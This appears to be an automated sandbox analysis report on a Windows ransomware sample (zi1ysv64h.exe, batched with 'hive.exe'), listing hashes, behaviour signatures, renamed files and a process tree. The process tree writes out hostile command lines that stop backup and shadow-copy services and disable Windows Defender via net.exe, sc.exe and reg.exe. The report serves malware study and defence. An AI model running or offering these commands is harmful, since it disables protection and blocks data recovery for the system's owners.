Overview
overview
10Static
static
8211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-2004-x64
10hive.exe
windows7-x64
10hive.exe
windows10-2004-x64
10sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-2004-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-2004-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-2004-x64
10Resubmissions
23-12-2022 20:19
221223-y39gvahb28 1023-12-2022 19:54
221223-ymz88scc8w 1023-12-2022 19:42
221223-yerbcsha78 10Analysis
-
max time kernel
48s -
max time network
35s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-12-2022 19:42
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
211xahcou.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20221111-en
Behavioral task
behavioral4
Sample
hive.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
sjl8j6ap3.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20221111-en
Behavioral task
behavioral8
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
zi1ysv64h.exe
Resource
win7-20221111-en
General
-
Target
zi1ysv64h.exe
-
Size
3.3MB
-
MD5
5384c6825a5707241c11d78529dbbfee
-
SHA1
85f5587e8ad534c2e5de0e72450b61ebda93e4fd
-
SHA256
3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
-
SHA512
856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
-
SSDEEP
49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1540 MpCmdRun.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1068 wevtutil.exe 836 wevtutil.exe 1560 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1180 bcdedit.exe 864 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_SELN4IZ9VPc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_zOYF9CAbNfc0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_4ylsYNwAsxs0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_b-GCFZGrpkA0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_bkjMugcT0140.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_cHNh75lQRpI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_K7V74r2nJNk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_EeeB1RJBnIE0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_gkBPFcV2yOk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_hzGikM7ZKPk0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\7-Zip\History.txt.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_WK7OKs1i1240.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_8ODa6C7LmYg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_JwgquchypgM0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\rtstreamsource.ax zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_1TkE670dS2s0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_-vcMYe0t5t80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_woIx0ZJM38w0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_b-QKNT4rchI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_i2rRoFNyvlo0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_VFkIk4eyY-k0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_RaEz3T2DXvY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_ep0tDOUPcq40.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_krUM_GTtWDU0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\TipBand.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_jrIKdGolT5U0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_vYdVXpaQkPU0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\it-IT\wab32res.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_cqr-C7nOtkY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_hTXb7RdN6_Q0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_8gtmiQOMBz00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\en-US\wab32res.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_5hE_gcyu7Z80.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_uUcyEKARH-c0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_tC-zPPvgxaI0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_IQlP_g8VM4Q0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipRes.dll.mui zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_04urTU6SDxg0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_euk2o8w34NQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InputPersonalization.exe.mui zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\de-DE\msinfo32.exe.mui zi1ysv64h.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_ButtonGraphic.png zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_SPLpCTspor00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_u98yq79T88k0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_u8RuN0mEEV00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_VmN5p3ST-dY0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Common Files\System\ado\msado21.tlb zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_Xh0QDQJxmK00.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_J6gy3edLDeQ0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_pYH50TOoAXw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_prpnkQ21FeA0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_lTvQra8HB0I0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_XGykzmbCIEw0.2o4xo zi1ysv64h.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar.f3tTiJPb00icuHvoAdF6J3e-coEZi-Q56NHm-A_qxkj_zVmjudSkCNE0.2o4xo zi1ysv64h.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 848 sc.exe 1096 sc.exe 816 sc.exe 944 sc.exe 1752 sc.exe 1868 sc.exe 2024 sc.exe 852 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 292 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1684 powershell.exe 2096 powershell.exe 2032 zi1ysv64h.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1068 wevtutil.exe Token: SeBackupPrivilege 1068 wevtutil.exe Token: SeSecurityPrivilege 836 wevtutil.exe Token: SeBackupPrivilege 836 wevtutil.exe Token: SeSecurityPrivilege 1560 wevtutil.exe Token: SeBackupPrivilege 1560 wevtutil.exe Token: SeIncreaseQuotaPrivilege 912 wmic.exe Token: SeSecurityPrivilege 912 wmic.exe Token: SeTakeOwnershipPrivilege 912 wmic.exe Token: SeLoadDriverPrivilege 912 wmic.exe Token: SeSystemProfilePrivilege 912 wmic.exe Token: SeSystemtimePrivilege 912 wmic.exe Token: SeProfSingleProcessPrivilege 912 wmic.exe Token: SeIncBasePriorityPrivilege 912 wmic.exe Token: SeCreatePagefilePrivilege 912 wmic.exe Token: SeBackupPrivilege 912 wmic.exe Token: SeRestorePrivilege 912 wmic.exe Token: SeShutdownPrivilege 912 wmic.exe Token: SeDebugPrivilege 912 wmic.exe Token: SeSystemEnvironmentPrivilege 912 wmic.exe Token: SeRemoteShutdownPrivilege 912 wmic.exe Token: SeUndockPrivilege 912 wmic.exe Token: SeManageVolumePrivilege 912 wmic.exe Token: 33 912 wmic.exe Token: 34 912 wmic.exe Token: 35 912 wmic.exe Token: SeIncreaseQuotaPrivilege 936 wmic.exe Token: SeSecurityPrivilege 936 wmic.exe Token: SeTakeOwnershipPrivilege 936 wmic.exe Token: SeLoadDriverPrivilege 936 wmic.exe Token: SeSystemProfilePrivilege 936 wmic.exe Token: SeSystemtimePrivilege 936 wmic.exe Token: SeProfSingleProcessPrivilege 936 wmic.exe Token: SeIncBasePriorityPrivilege 936 wmic.exe Token: SeCreatePagefilePrivilege 936 wmic.exe Token: SeBackupPrivilege 936 wmic.exe Token: SeRestorePrivilege 936 wmic.exe Token: SeShutdownPrivilege 936 wmic.exe Token: SeDebugPrivilege 936 wmic.exe Token: SeSystemEnvironmentPrivilege 936 wmic.exe Token: SeRemoteShutdownPrivilege 936 wmic.exe Token: SeUndockPrivilege 936 wmic.exe Token: SeManageVolumePrivilege 936 wmic.exe Token: 33 936 wmic.exe Token: 34 936 wmic.exe Token: 35 936 wmic.exe Token: SeIncreaseQuotaPrivilege 936 wmic.exe Token: SeSecurityPrivilege 936 wmic.exe Token: SeTakeOwnershipPrivilege 936 wmic.exe Token: SeLoadDriverPrivilege 936 wmic.exe Token: SeSystemProfilePrivilege 936 wmic.exe Token: SeSystemtimePrivilege 936 wmic.exe Token: SeProfSingleProcessPrivilege 936 wmic.exe Token: SeIncBasePriorityPrivilege 936 wmic.exe Token: SeCreatePagefilePrivilege 936 wmic.exe Token: SeBackupPrivilege 936 wmic.exe Token: SeRestorePrivilege 936 wmic.exe Token: SeShutdownPrivilege 936 wmic.exe Token: SeDebugPrivilege 936 wmic.exe Token: SeSystemEnvironmentPrivilege 936 wmic.exe Token: SeRemoteShutdownPrivilege 936 wmic.exe Token: SeUndockPrivilege 936 wmic.exe Token: SeManageVolumePrivilege 936 wmic.exe Token: 33 936 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2032 wrote to memory of 1160 2032 zi1ysv64h.exe 29 PID 2032 wrote to memory of 1160 2032 zi1ysv64h.exe 29 PID 2032 wrote to memory of 1160 2032 zi1ysv64h.exe 29 PID 1160 wrote to memory of 580 1160 net.exe 31 PID 1160 wrote to memory of 580 1160 net.exe 31 PID 1160 wrote to memory of 580 1160 net.exe 31 PID 2032 wrote to memory of 576 2032 zi1ysv64h.exe 32 PID 2032 wrote to memory of 576 2032 zi1ysv64h.exe 32 PID 2032 wrote to memory of 576 2032 zi1ysv64h.exe 32 PID 576 wrote to memory of 1348 576 net.exe 34 PID 576 wrote to memory of 1348 576 net.exe 34 PID 576 wrote to memory of 1348 576 net.exe 34 PID 2032 wrote to memory of 708 2032 zi1ysv64h.exe 35 PID 2032 wrote to memory of 708 2032 zi1ysv64h.exe 35 PID 2032 wrote to memory of 708 2032 zi1ysv64h.exe 35 PID 708 wrote to memory of 1820 708 net.exe 37 PID 708 wrote to memory of 1820 708 net.exe 37 PID 708 wrote to memory of 1820 708 net.exe 37 PID 2032 wrote to memory of 1512 2032 zi1ysv64h.exe 38 PID 2032 wrote to memory of 1512 2032 zi1ysv64h.exe 38 PID 2032 wrote to memory of 1512 2032 zi1ysv64h.exe 38 PID 1512 wrote to memory of 1736 1512 net.exe 40 PID 1512 wrote to memory of 1736 1512 net.exe 40 PID 1512 wrote to memory of 1736 1512 net.exe 40 PID 2032 wrote to memory of 1148 2032 zi1ysv64h.exe 41 PID 2032 wrote to memory of 1148 2032 zi1ysv64h.exe 41 PID 2032 wrote to memory of 1148 2032 zi1ysv64h.exe 41 PID 1148 wrote to memory of 1632 1148 net.exe 43 PID 1148 wrote to memory of 1632 1148 net.exe 43 PID 1148 wrote to memory of 1632 1148 net.exe 43 PID 2032 wrote to memory of 1644 2032 zi1ysv64h.exe 44 PID 2032 wrote to memory of 1644 2032 zi1ysv64h.exe 44 PID 2032 wrote to memory of 1644 2032 zi1ysv64h.exe 44 PID 1644 wrote to memory of 280 1644 net.exe 46 PID 1644 wrote to memory of 280 1644 net.exe 46 PID 1644 wrote to memory of 280 1644 net.exe 46 PID 2032 wrote to memory of 1876 2032 zi1ysv64h.exe 47 PID 2032 wrote to memory of 1876 2032 zi1ysv64h.exe 47 PID 2032 wrote to memory of 1876 2032 zi1ysv64h.exe 47 PID 1876 wrote to memory of 1048 1876 net.exe 49 PID 1876 wrote to memory of 1048 1876 net.exe 49 PID 1876 wrote to memory of 1048 1876 net.exe 49 PID 2032 wrote to memory of 1556 2032 zi1ysv64h.exe 50 PID 2032 wrote to memory of 1556 2032 zi1ysv64h.exe 50 PID 2032 wrote to memory of 1556 2032 zi1ysv64h.exe 50 PID 1556 wrote to memory of 984 1556 net.exe 52 PID 1556 wrote to memory of 984 1556 net.exe 52 PID 1556 wrote to memory of 984 1556 net.exe 52 PID 2032 wrote to memory of 848 2032 zi1ysv64h.exe 53 PID 2032 wrote to memory of 848 2032 zi1ysv64h.exe 53 PID 2032 wrote to memory of 848 2032 zi1ysv64h.exe 53 PID 2032 wrote to memory of 1096 2032 zi1ysv64h.exe 55 PID 2032 wrote to memory of 1096 2032 zi1ysv64h.exe 55 PID 2032 wrote to memory of 1096 2032 zi1ysv64h.exe 55 PID 2032 wrote to memory of 816 2032 zi1ysv64h.exe 57 PID 2032 wrote to memory of 816 2032 zi1ysv64h.exe 57 PID 2032 wrote to memory of 816 2032 zi1ysv64h.exe 57 PID 2032 wrote to memory of 944 2032 zi1ysv64h.exe 59 PID 2032 wrote to memory of 944 2032 zi1ysv64h.exe 59 PID 2032 wrote to memory of 944 2032 zi1ysv64h.exe 59 PID 2032 wrote to memory of 1752 2032 zi1ysv64h.exe 61 PID 2032 wrote to memory of 1752 2032 zi1ysv64h.exe 61 PID 2032 wrote to memory of 1752 2032 zi1ysv64h.exe 61 PID 2032 wrote to memory of 1868 2032 zi1ysv64h.exe 63
Processes
-
C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:580
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1348
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1820
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1736
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1632
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:280
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1048
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:984
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1096
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:816
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:944
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:1752
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1868
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:852
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:784
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1104
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1712
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1356
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1020
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1012
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:700
-
-
